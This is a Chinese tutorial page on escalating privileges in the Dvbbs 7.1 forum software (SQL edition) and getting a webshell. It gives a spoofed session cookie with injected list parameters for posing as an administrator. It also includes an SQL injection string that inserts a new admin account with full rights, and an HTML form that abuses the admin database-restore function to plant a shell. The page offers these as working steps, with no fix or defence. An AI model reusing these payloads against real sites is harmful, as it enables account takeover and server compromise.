手机
当前位置:查字典教程网 >实用技巧 >漏洞研究 >最新dvbbs 7.1sql提权得shell
最新dvbbs 7.1sql提权得shell
摘要:dvbbs7.1跳过死循环,按linzi的方法只能是有一个管理权限,而只是新手上路的等级如果是sql版,就不好暴库,事实上好像只需要抓取SE...

dvbbs7.1跳过死循环,按linzi的方法只能是有一个管理权限,而只是新手上路的等级

如果是sql版,就不好暴库,事实上好像只需要抓取SESSION即可,不要登陆任何用户。

欺骗时不要关闭假死的那个ie

这个是死循环的SESSION:

ASPSESSIONIDQCTRTQAC=HOPNBJLCKHGDDPNAAIOCKGCJ

加入或替换到可以欺骗的浏览器的cookie栏。

List=list5+and+1%3D2=1&list5+and+1%3D1=1&list1+and+1%3D2=1&list1+and+1%3D1=1&list3+and+1%3D2=1&list3+and+1%3D1=1;ASPSESSIONIDQCTRTQAC=HOPNBJLCKHGDDPNAAIOCKGCJ

然后点任何板块

就能发现,你欺骗的用户和等级都是管理员了。

后台管理员可以通过用户奖励那里加入

test','127.0.0.1',5);insertintodv_admin(username,[password],flag,adduser)values('jinsdb','4ac646c9e65a1769','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37','jinsdb');--

dvbbs7.1sql后台得shell

<formaction="http://127.0.0.1/bbs/admin/data.asp?act...t=Restore"method="post">

<p>已上传文件的位置:<inputname="Dbpath"type="text"size="80"></p>

<p>要复制到的位置:<inputname="backpath"type="text"size="80"></p>

<p><inputtype="submit"value="提交"></p>

</form>

好像7.1的usercookies只是个幌子

根本没必要

去掉了也一样可以使用

搞笑

【最新dvbbs 7.1sql提权得shell】相关文章:

L-BLOG 漏洞介绍及修复(图)

细说3721网络实名“病毒”

青创文章系统安全性分析

解密DDoS攻击——“缓存溢出”新变形

四大漏洞入侵博客

针对蓝牙PIN码的最新攻击技术细节分析

动网dvbbs7.1论坛权限提升漏洞及防范(图)

DVBBS7.1后台备份得到一个webshell

Flash 0day生成器提供下载

专家观点:破解MD5和SHA-1不意味密码破解(图)

精品推荐
分类导航